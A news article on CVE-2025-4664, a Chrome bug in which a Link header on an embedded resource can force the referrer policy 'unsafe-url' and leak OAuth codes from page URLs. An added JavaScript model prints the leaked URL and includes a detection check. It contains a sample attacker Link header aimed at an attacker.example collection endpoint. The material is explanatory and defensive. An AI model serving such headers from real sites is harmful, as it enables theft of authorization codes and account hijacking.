Active Exploitation of Chrome Vulnerability Allows Account Hijacking
By Netvora Tech News
The Cybersecurity and Infrastructure Security Agency (CISA) of the US Department of Homeland Security has issued a warning about an actively exploited vulnerability in Google Chrome that allows attackers to steal sensitive data from users' accounts. The vulnerability, tracked as CVE-2025-4664, lies in the browser's Loader component, which failed to enforce policy correctly when handling resource loads.

Security researcher Vsevolod Kokorin first described the issue publicly on May 5. The problem lies in the HTTP Link header, which browsers use for resource hints such as preloading and which can also carry a referrer policy for the resource it names. Chrome, unlike other browsers, honours Link headers on subresource responses, so an attacker who controls any resource embedded in a page (an image is enough) can answer with a Link header that sets the referrer policy "unsafe-url". The browser then sends the embedding page's full URL, query string included, in the Referer header of the follow-up request. Query strings often carry sensitive values, for example the authorization code in an OAuth callback, and capturing one can lead to account takeover.

CISA maintains the Known Exploited Vulnerabilities catalog, and CVE-2025-4664 has been added to it. Details about the observed attacks are not publicly available. US federal agencies have been instructed to update their Google Chrome installations by June 5.

Google has confirmed that the security update (Chrome 136.0.7103.113/.114) will be rolled out to users over the coming days and weeks. Users who cannot wait can trigger a manual update.
How the Vulnerability Works
The vulnerability lets an attacker read sensitive data out of a victim's browser by abusing the Link header. The chain looks like this:
- The victim loads a page whose URL carries a secret in the query string, for example an OAuth callback carrying the authorization code, and that page embeds a subresource (an image is enough) served from a host the attacker controls.
- The attacker's server answers the image request with a Link header that names a further resource to preload and sets referrerpolicy=unsafe-url on it.
- Chrome, unlike other browsers, processes Link headers on subresource responses. It fetches the named resource and, because the link's own policy overrides the page's default, sends the victim page's full URL, query string included, in the Referer header. Under the default policy (strict-origin-when-cross-origin) only the origin would be sent.
- The attacker's endpoint logs the Referer and extracts the OAuth code or other sensitive parameters, which can be enough to hijack the account.
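The chain above, worked as an added example. This is not code from the article, from Kokorin's report, or from Chromium: it models what the Referrer Policy specification says a browser sends under each policy, and parses the Link header through which the attacker asks for "unsafe-url". The Chrome bug itself was honouring such headers on subresource responses at all; the model simply shows why that matters. Hostnames, paths and the OAuth code are constructed for illustration, and the function names are the example's own.

```javascript
// Added example (not from the article, Kokorin's report, or Chromium).
// Models the Referer a browser sends under each referrer policy and parses the
// Link response header an attacker would use to request "unsafe-url".

// Parse a Link header value into [{ url, params }] (RFC 8288, simplified:
// no quoted commas, parameter names lower-cased, quotes stripped from values).
function parseLinkHeader(value) {
  const links = [];
  for (const part of value.split(/,(?=\s*<)/)) {
    const m = part.trim().match(/^<([^>]*)>\s*(.*)$/);
    if (!m) continue;
    const params = {};
    for (const p of m[2].split(';')) {
      const kv = p.trim().match(/^([^=\s]+)\s*=\s*"?([^"]*)"?$/);
      if (kv) params[kv[1].toLowerCase()] = kv[2];
    }
    links.push({ url: m[1], params });
  }
  return links;
}

// A "full" referrer is the document URL minus credentials and fragment.
function stripForReferrer(href) {
  const u = new URL(href);
  u.username = '';
  u.password = '';
  u.hash = '';
  return u.href;
}

// Referer the browser attaches to a request from docUrl to targetUrl under policy.
function refererFor(docUrl, targetUrl, policy) {
  const doc = new URL(docUrl);
  const target = new URL(targetUrl);
  const sameOrigin = doc.origin === target.origin;
  const downgrade = doc.protocol === 'https:' && target.protocol === 'http:';
  const full = stripForReferrer(docUrl);
  const origin = doc.origin + '/';
  switch (policy) {
    case 'no-referrer': return null;
    case 'unsafe-url': return full;                       // full URL, always
    case 'origin': return origin;
    case 'same-origin': return sameOrigin ? full : null;
    case 'strict-origin': return downgrade ? null : origin;
    case 'origin-when-cross-origin': return sameOrigin ? full : origin;
    case 'no-referrer-when-downgrade': return downgrade ? null : full;
    default:                                              // strict-origin-when-cross-origin (browser default)
      if (downgrade) return null;
      return sameOrigin ? full : origin;
  }
}

// Referer each preload triggered by an attacker's Link header would carry.
// The link's own referrerpolicy parameter overrides the document's policy,
// which is why "unsafe-url" defeats the default on the victim page.
function preloadReferers(docUrl, linkHeader, docPolicy = 'strict-origin-when-cross-origin') {
  return parseLinkHeader(linkHeader)
    .filter(l => (l.params.rel || '').split(/\s+/).includes('preload'))
    .map(l => {
      const policy = (l.params.referrerpolicy || docPolicy).toLowerCase();
      return { url: l.url, policy, referer: refererFor(docUrl, l.url, policy) };
    });
}

// Detection check for a proxy, test suite or header scanner: does a third-party
// response ask for a policy that sends the full URL to a cross-origin host?
function linkLeaksQuery(linkHeader) {
  return parseLinkHeader(linkHeader).some(l => {
    const p = (l.params.referrerpolicy || '').toLowerCase();
    return p === 'unsafe-url' || p === 'no-referrer-when-downgrade';
  });
}

// Constructed scenario: an OAuth callback page embeds an image from
// attacker.example, whose server answers the image request with this header.
const VICTIM_PAGE = 'https://victim.example/oauth/callback?code=SECRET-CODE&state=abc';
const ATTACKER_LINK = '<https://attacker.example/collect>; rel=preload; as=image; referrerpolicy=unsafe-url';

for (const r of preloadReferers(VICTIM_PAGE, ATTACKER_LINK)) {
  console.log(`${r.policy}: Referer -> ${r.referer}`);
}
console.log('default policy would send:',
  refererFor(VICTIM_PAGE, 'https://attacker.example/collect', 'strict-origin-when-cross-origin'));
console.log('flagged by linkLeaksQuery:', linkLeaksQuery(ATTACKER_LINK));
```

Run with node. The first line printed is the full callback URL, authorization code included, that the preload request would carry; the "default policy" line shows that only the origin would have been sent. The linkLeaksQuery check is the cheap screen a security team can apply to responses from third-party hosts, and it does not depend on the browser fix.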
What Users Can Do
To protect themselves from this vulnerability, users can take the following steps:
- Update Google Chrome as soon as possible. Opening chrome://settings/help triggers an update check and shows the installed version; the fix ships in 136.0.7103.113/.114.
- Use the manual update if the automatic rollout has not reached the machine yet, and relaunch the browser afterwards, since the new version is not active until restart.
- Be cautious with links from unknown sources and avoid suspicious websites. Note that the leak is triggered by an embedded third-party resource, so a page does not have to look malicious to trigger it.